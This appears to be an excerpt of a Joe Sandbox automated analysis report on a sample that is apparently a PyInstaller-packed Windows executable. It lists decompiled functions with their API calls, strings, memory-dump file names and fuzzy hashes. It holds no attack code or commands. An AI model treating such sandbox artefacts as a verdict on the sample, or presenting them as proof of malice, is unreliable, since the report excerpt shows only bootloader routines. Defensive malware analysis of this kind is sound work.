%.*s, xrefs: 00007FF72B8D830C
\, xrefs: 00007FF72B8D8261
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF72B8D82D9
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF72B8D8373

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction ID: 2d32c49e219293bdaf9922161c236abd7ee077774247c5db85b1eae413ab9730
Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction Fuzzy Hash: B1516511A28A8381FA55BB3DDC516B9E250EF94B80FC44432D64E466F5FE2CF5248FE0

Function 00007FF72B8D2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF72B8D21AB
SelectObject.GDI32 ref: 00007FF72B8D21F2
DrawTextW.USER32 ref: 00007FF72B8D2215
SelectObject.GDI32 ref: 00007FF72B8D222B
ReleaseDC.USER32 ref: 00007FF72B8D223B
MoveWindow.USER32 ref: 00007FF72B8D228B
MoveWindow.USER32 ref: 00007FF72B8D22CB
MoveWindow.USER32 ref: 00007FF72B8D231E
MoveWindow.USER32 ref: 00007FF72B8D2366

Strings

P%, xrefs: 00007FF72B8D21FF

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 602ff3fddd5e8d186fd3de6dfb90e2b0f8670ae4e032fd522d98a9bbe3d12290
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 6D510726604BA186D6349F36E8181BAF7A1FBA8B61F404131EFDE43694DF3CE055CB20

Function 00007FF72B8D80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF72B8D80FF
GetWindowLongPtrW.USER32 ref: 00007FF72B8D817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF72B8D8192
GetLastError.KERNEL32 ref: 00007FF72B8D819C
SetWindowLongPtrW.USER32 ref: 00007FF72B8D81B3

Strings

Needs to remove its temporary files., xrefs: 00007FF72B8D8185

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: dc04b61a7c7a7ff23d59ca9d9c4ffc016522fb8d9fdaf4b062650158f198bc4d
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 5F218621B08A4381EB45AB7EEC44279A250EF98F90FD84131DE1D433F4DE2CF5A58B60

Function 00007FF72B8E6290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E62D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E66C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E695C

Strings

p, xrefs: 00007FF72B8E6385
:, xrefs: 00007FF72B8E648C
f, xrefs: 00007FF72B8E63F5
p, xrefs: 00007FF72B8E63FD
-, xrefs: 00007FF72B8E6369

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 938eec027d87d3f4197fc7adad903c8d7354237c02b94e9497ed969765e767c3
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: FE12B161E1C2C386FB207A98D90427AF6A1FB40754FC84135F69D066E6DB3CE5A0CFA0

Function 00007FF72B8E0FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E1008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E13D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E166F

Strings

f, xrefs: 00007FF72B8E10A0
f, xrefs: 00007FF72B8E1255
p, xrefs: 00007FF72B8E1112
p, xrefs: 00007FF72B8E10AD
f, xrefs: 00007FF72B8E110A

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 3632eecae49ba61a60236cc58650b33a3721f93588d19e1dce4a4f436e84100f
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 0D128561E0C1C386FB28BA98E844679F691FB40754FD44135F69E46AE4DB7CE4E08FA0

Function 00007FF72B8D1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF72B8D10D3
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B8D10CC
fread, xrefs: 00007FF72B8D11FD
malloc, xrefs: 00007FF72B8D110F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B8D11F6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B8D1098
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF72B8D1108

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: bb53b9f83130c86f90c73192f8f8ea576b0e1637b53f6056db95b778128c6f12
Instruction ID: 83cfab70b35b6218bc2e729055d27829a962ed3e010c76a4d8c08f84fa9c6d59
Opcode Fuzzy Hash: bb53b9f83130c86f90c73192f8f8ea576b0e1637b53f6056db95b778128c6f12
Instruction Fuzzy Hash: 21418661B1865381EE10FB6AAC016B9E391FF48BC4FC44432ED4C477A6DE3CE5658BA0

Function 00007FF72B8D1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF72B8D14E5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B8D14DE
fread, xrefs: 00007FF72B8D15E6
malloc, xrefs: 00007FF72B8D151F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B8D15DF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B8D149F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF72B8D1518

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 0e986b4e5c265948de3afc9e4e2e10f8185b4b3ab4291cce073a7edd1c97f69a
Instruction ID: 8f813819b6be0905e9e9ae8a2eef6f5c87abca285ad1e5ec01dfa768809c8fc0
Opcode Fuzzy Hash: 0e986b4e5c265948de3afc9e4e2e10f8185b4b3ab4291cce073a7edd1c97f69a
Instruction Fuzzy Hash: 3F417E21B0868386EA10FB79D8005B9E3A0EF48794FC84532ED4D07BA5DE3CE561CFA0

Function 00007FF72B8DEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF72B8DEA65

Part of subcall function 00007FF72B8DF9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF72B8DF9FF
Part of subcall function 00007FF72B8DF9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF72B8DFA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF72B8DEB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF72B8DED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF72B8DEE98

Strings

csm, xrefs: 00007FF72B8DEAE6
csm, xrefs: 00007FF72B8DEA7F
csm, xrefs: 00007FF72B8DEB60

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: 47a65e41b8ceb493c094f77ec17b72afe32b981dc60d76e00314d4eb471feb1e
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 76D1713390874286EB20AB79D8403ADB7A0FB45799FD00176DE8D57BA5DF38E461CB90

Function 00007FF72B8EED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF72B8EF0AA,?,?,-00000018,00007FF72B8EAD53,?,?,?,00007FF72B8EAC4A,?,?,?,00007FF72B8E5F3E), ref: 00007FF72B8EEE8C
GetProcAddress.KERNEL32(?,?,?,00007FF72B8EF0AA,?,?,-00000018,00007FF72B8EAD53,?,?,?,00007FF72B8EAC4A,?,?,?,00007FF72B8E5F3E), ref: 00007FF72B8EEE98

Strings

api-ms-, xrefs: 00007FF72B8EEDD6
ext-ms-, xrefs: 00007FF72B8EEDE9

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 6c36cc289b2c5ddd2c530575b7c81bb2694fff85a8ed1fea88389ae8b79363d1
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: 93416662B18A4381FA51EB5E9C00675A391FF48BD0FC84535ED1D47BA4EF3CE8248BA0

Function 00007FF72B8D2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2D63
MessageBoxW.USER32 ref: 00007FF72B8D2D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF72B8D2D70
%ls: , xrefs: 00007FF72B8D2D22
Error, xrefs: 00007FF72B8D2D8C
[PYI-%d:ERROR] , xrefs: 00007FF72B8D2CA6

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: d5e37351c6edec640560ad20ecdcaf8182e00e998b03055ca19e860c63bd8180
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 8831D822B08B4142E620BB29FC506ABA695FF88794FC10136EF8D93769DF3CD556CB50

Function 00007FF72B8DDCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDD4D
GetLastError.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDD85
FreeLibrary.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDDF3
GetProcAddress.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDDFF

Strings

api-ms-, xrefs: 00007FF72B8DDD6D

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: e693363df6aa2b10b3ae530858529ad6ece208eeb382e53cbb69a837ecadc5e5
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 0531FB21B1A74392EE11BB2A9C006B5A3D4FF59BA0FD94536DD1D473A0EF3CE4548BA0

Function 00007FF72B8D6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Failed to load Python DLL '%ls'., xrefs: 00007FF72B8D64A7
LoadLibrary, xrefs: 00007FF72B8D64AE
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF72B8D6407
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF72B8D63C7
ucrtbase.dll, xrefs: 00007FF72B8D63DD
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF72B8D6456

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction ID: 8a2694a0a89e62a4bc7ef1fea782f1af076d9b140534edd3fb316c979a12473f
Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction Fuzzy Hash: 43415321A1868791EA15FB38E8541E9A311FF54384FC00133DA5D436A5DF3CF625CFA0

Function 00007FF72B8EB150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF72B8EB15F
FlsGetValue.KERNEL32 ref: 00007FF72B8EB174
FlsSetValue.KERNEL32 ref: 00007FF72B8EB195
FlsSetValue.KERNEL32 ref: 00007FF72B8EB1C2
FlsSetValue.KERNEL32 ref: 00007FF72B8EB1D3
FlsSetValue.KERNEL32 ref: 00007FF72B8EB1E4
SetLastError.KERNEL32 ref: 00007FF72B8EB1FF

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction ID: 7620a577f740ce63c8e4d07ac11d9a7073508ed7ec623c02ad5ae9e7b5b1336d
Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction Fuzzy Hash: 0E212120E0C6C281F594B3AD5D91239E196DF44BB0F948634F97D46AF6DE3CB4614FA0

Function 00007FF72B8F7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF72B8F7D9D
GetLastError.KERNEL32 ref: 00007FF72B8F7DA9
CloseHandle.KERNEL32 ref: 00007FF72B8F7DC1
CreateFileW.KERNEL32 ref: 00007FF72B8F7DEC
WriteConsoleW.KERNEL32 ref: 00007FF72B8F7E0B

Strings

CONOUT$, xrefs: 00007FF72B8F7DCD

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: da80ebf678fd8bba726a7d3e8d9d80a4dd4805a2fa9df1011e6f8dd57eff2770
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 07119631B18A4186F750AB5AEC54339A2A4FBA8FE4F800634D95D877B4DF7CE4548B50

Function 00007FF72B8EB2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB2D7
FlsSetValue.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB30D
FlsSetValue.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB33A
FlsSetValue.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB34B
FlsSetValue.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB35C
